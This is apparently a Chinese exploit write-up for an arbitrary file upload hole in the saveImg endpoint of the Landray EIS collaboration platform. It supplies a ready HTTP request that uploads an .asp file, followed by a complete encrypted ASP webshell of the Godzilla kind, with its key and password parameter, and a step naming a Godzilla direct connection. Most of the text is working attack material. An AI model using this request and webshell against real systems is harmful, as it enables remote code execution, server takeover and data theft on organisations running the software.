蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞

蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞

• 一、蓝凌EIS简介
• 二、漏洞描述
• 三、影响版本
• 四、fofa查询语句
• 五、漏洞复现
• 六、深度复现
• • 1、发送如花
  • 2、哥斯拉直连

一、蓝凌EIS简介

蓝凌智慧协同平台eis集合了非常丰富的模块，满足组织企业在知识、协同、项目管理系统建设等需求

二、漏洞描述

蓝凌智慧协同平台EIS集合了非常丰富的模块，满足组织企业在知识、协同、项目管理系统建设等需求。该平台saveImg接口存在任意文件上传漏洞，通过该漏洞可上传weshell。

三、影响版本

蓝凌智慧协同平台EIS

四、fofa查询语句

五、漏洞复现

漏洞数据包：

POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Length: 179
Content-Type: multipart/form-data; boundary=25c172e79b2758a7d7ff9fe9cab4a76d

--25c172e79b2758a7d7ff9fe9cab4a76d
Content-Disposition: form-data; name="file"; filename="50514.asp"
Content-Type: text/html

578321995
--25c172e79b2758a7d7ff9fe9cab4a76d--

burp发包

POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=25c172e79b2758a7d7ff9fe9cab4a76d
Content-Length: 1950

--25c172e79b2758a7d7ff9fe9cab4a76d
Content-Disposition: form-data; name="file"; filename="50514.asp"
Content-Type: text/html

<%
Set bypassDictionary = Server.CreateObject("Scripting.Dictionary")

Function Base64Decode(ByVal vCode)
    Dim oXML, oNode
    Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
    Set oNode = oXML.CreateElement("base64")
    oNode.dataType = "bin.base64"
    oNode.text = vCode
    Base64Decode = oNode.nodeTypedValue
    Set oNode = Nothing
    Set oXML = Nothing
End Function

Function decryption(content,isBin)
    dim size,i,result,keySize
    keySize = len(key)
    Set BinaryStream = CreateObject("ADODB.Stream")
    BinaryStream.CharSet = "iso-8859-1"
    BinaryStream.Type = 2
    BinaryStream.Open
    if IsArray(content) then
        size=UBound(content)+1
        For i=1 To size
            BinaryStream.WriteText chrw(ascb(midb(content,i,1)) Xor Asc(Mid(key,(i mod keySize)+1,1)))
        Next
    end if
    BinaryStream.Position = 0
    if isBin then
        BinaryStream.Type = 1
        decryption=BinaryStream.Read()
    else
        decryption=BinaryStream.ReadText()
    end if

End Function
    key="3c6e0b8a9c15224a"
    content=request.Form("123456")
    if not IsEmpty(content) then

        if  IsEmpty(Session("payload")) then
            content=decryption(Base64Decode(content),false)
            Session("payload")=content
            response.End
        else
            content=decryption(Base64Decode(content),true)
            bypassDictionary.Add "payload",Session("payload")
            Execute(bypassDictionary("payload"))
            result=run(content)
            response.Write("ca0be7")
            if not IsEmpty(result) then
                response.Write Base64Encode(decryption(result,true))
            end if
            response.Write("2d6353")
        end if
    end if
%>
--25c172e79b2758a7d7ff9fe9cab4a76d--

六、深度复现

1、发送如花

2、哥斯拉直连